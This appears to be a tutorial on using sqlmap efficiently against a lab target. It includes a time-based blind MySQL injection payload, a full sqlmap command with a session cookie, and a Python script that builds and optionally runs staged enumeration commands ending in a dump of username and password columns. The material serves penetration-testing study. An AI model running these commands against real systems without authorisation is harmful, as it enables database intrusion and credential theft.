A tool is only as effective as its operator. Choosing sqlmap's flags deliberately, rather than stacking every option that might help, improves the efficiency, confidence, and success rate of injection testing.
Key Recommendations
• --help (or -h) prints the basic options and -hh the complete advanced list; filter it to find a flag quickly, e.g. sqlmap -hh | grep -i <keyword>.
• -H "Name: value" adds the headers the request actually needs, such as a session cookie (--cookie="..." is the dedicated option for that). Limit headers to those the application requires; extra ones only add noise.
• --wizard is useful for beginners, as it builds the command through step-by-step prompts.
• --dump and --dump-all should be used selectively; dumping an entire database is rarely necessary, and it is slow and noisy on the target. Narrow with -D, -T and -C first.
โข Select only the flags that are essential for the task, and avoid redundant or unnecessary ones.
Building on Logs for Accuracy
Reuse what an earlier scan already established (the injectable parameter, the injection type and the back-end DBMS) to make the next run narrower and more reliable. sqlmap records this in the log file of its output directory (by default ~/.local/share/sqlmap/output/<host>/log in current versions).
Example (an excerpt from a previous scan's log; the random four-letter aliases sqlmap generates in the payload are shown as placeholders):
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=lll' AND (SELECT 5284 FROM (SELECT(SLEEP(5)))<alias>) AND '<str>'='<str>
For the follow-up scan, feed that information back in:
• --technique with the letter for the type already found: B (boolean-based blind), E (error-based), U (UNION query), S (stacked queries), T (time-based blind) or Q (inline queries). For the log above that is --technique=T, so sqlmap does not retry the other techniques.
• --dbms with the back end named in the Title line (here MySQL), so sqlmap skips fingerprinting other DBMSs.
• -p to test only the parameter already identified as injectable (here -p username).
• --data for the POST body (sqlmap then sends the request as POST), or -r to load a raw request saved from a proxy so that method, headers and body are reproduced exactly.
Constructing a Database Enumeration Command
To enumerate a database, add the flags in stages, each one narrowing the previous:
- --dbms to fix the DBMS type (taken from the earlier log).
- --dbs to list the available databases, then -D <name> to select the one of interest.
- --tables to list the tables of the selected database, then -T <table> --columns to list its columns.
- Continue refining: -C to pick the columns you need and --where (or --start/--stop) to limit the rows, and only then --dump.
Sample Command
Below is an example of a command incorporating these elements:
sqlmap -u "http://monitorsthree.htb/forgot_password.php" \
  -p username \
  -H "Cookie: PHPSESSID=24nmbcrm49p11q2agoartrh17d" \
  --data "username=name" \
  --dbms $$$ \
  --technique $$$
Replace each $$$ placeholder with the values taken from the earlier scan's log (e.g., --dbms MySQL and --technique T for time-based blind).
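The two steps described above, reading the previous log and then building the staged enumeration commands, as an added example in Python; this is not sqlmap's own code and the function names are illustrative. It assumes the log layout shown in the excerpt (a "Parameter: <name> (<place>)" line followed by indented Type, Title and Payload lines) and the mapping from sqlmap's Type wording to the letters --technique accepts. The sample log is constructed from the excerpt, with the random aliases replaced by "abcd" and "efgh", and the database and table names in the usage are placeholders.

```python
"""Build a focused sqlmap command from a previous scan's log.

Added example for this post (not sqlmap's own code). It assumes the log
layout shown above: "Parameter: <name> (<place>)" followed by indented
"Type:", "Title:" and "Payload:" lines. Function names are illustrative.
"""
import re
import shlex
import subprocess

# "Type:" wording sqlmap prints  ->  letter accepted by --technique
TECHNIQUE_LETTERS = {
    "boolean-based blind": "B",
    "error-based": "E",
    "UNION query": "U",
    "stacked queries": "S",
    "time-based blind": "T",
    "inline query": "Q",
}

# Back-end names that open a "Title:" line (a few common ones, not the full list).
DBMS_NAMES = ("MySQL", "PostgreSQL", "Microsoft SQL Server", "Oracle", "SQLite")

# Constructed sample input, modelled on the excerpt in the post; the random
# four-letter aliases sqlmap generates are replaced by "abcd" and "efgh".
SAMPLE_LOG = """\
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=lll' AND (SELECT 5284 FROM (SELECT(SLEEP(5)))abcd) AND 'efgh'='efgh
"""


def parse_log(text):
    """Extract parameter, place, technique letter, DBMS and payload from a log excerpt."""
    info = {"parameter": None, "place": None, "technique": None, "dbms": None, "payload": None}
    m = re.search(r"^\s*Parameter:\s*(\S+)\s*\((\w+)\)", text, re.M)
    if m:
        info["parameter"], info["place"] = m.group(1), m.group(2)
    m = re.search(r"^\s*Type:\s*(.+?)\s*$", text, re.M)
    if m:
        info["technique"] = TECHNIQUE_LETTERS.get(m.group(1))   # None if wording is unknown
    m = re.search(r"^\s*Title:\s*(.+?)\s*$", text, re.M)
    if m:
        info["dbms"] = next((d for d in DBMS_NAMES if m.group(1).startswith(d)), None)
    m = re.search(r"^\s*Payload:\s*(.+?)\s*$", text, re.M)
    if m:
        info["payload"] = m.group(1)
    return info


def base_argv(url, info, headers=(), data=None):
    """Compose only the options the log justifies: no fingerprinting of other
    DBMSs, no other techniques, no other parameters."""
    argv = ["sqlmap", "-u", url, "--batch"]
    for header in headers:
        argv += ["-H", header]
    if data is not None:
        argv += ["--data", data]          # POST body; sqlmap switches to POST by itself
    if info["parameter"]:
        argv += ["-p", info["parameter"]]
    if info["dbms"]:
        argv += ["--dbms", info["dbms"]]
    if info["technique"]:
        argv += ["--technique", info["technique"]]
    return argv


def next_stage(argv, db=None, table=None, columns=None, where=None):
    """Return argv for the narrowest enumeration step that is still useful,
    given what is already known. It never reaches for --dump-all."""
    argv = list(argv)
    if db is None:
        return argv + ["--dbs"]
    if table is None:
        return argv + ["-D", db, "--tables"]
    if columns is None:
        return argv + ["-D", db, "-T", table, "--columns"]
    argv += ["-D", db, "-T", table, "-C", ",".join(columns), "--dump"]
    if where:
        argv += ["--where", where]        # dump only the rows the test needs
    return argv


def run(argv, execute=False):
    """Print the command; execute it only when asked (sqlmap must be on PATH)."""
    print(shlex.join(argv))
    if execute:
        return subprocess.run(argv, check=False).returncode
    return None


if __name__ == "__main__":
    found = parse_log(SAMPLE_LOG)
    base = base_argv("http://monitorsthree.htb/forgot_password.php", found,
                     headers=["Cookie: PHPSESSID=24nmbcrm49p11q2agoartrh17d"],
                     data="username=name")
    run(next_stage(base))                                    # --dbs
    run(next_stage(base, db="app"))                          # "app": placeholder name
    run(next_stage(base, db="app", table="users",            # "users": placeholder name
                   columns=["username", "password"], where="id=1"))
```

Run without arguments it only prints the three staged commands; pass execute=True to run() once you have checked the output matches what the log justifies. To process a real log, read ~/.local/share/sqlmap/output/<host>/log and hand its text to parse_log().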
Conclusion
By building the command up gradually, sqlmap can be tailored to deliver focused, accurate results with minimal load on the target. Every flag you add should earn its place by making the test more precise or more efficient.
Further Reference: https://github.com/sqlmapproject/sqlmap/wiki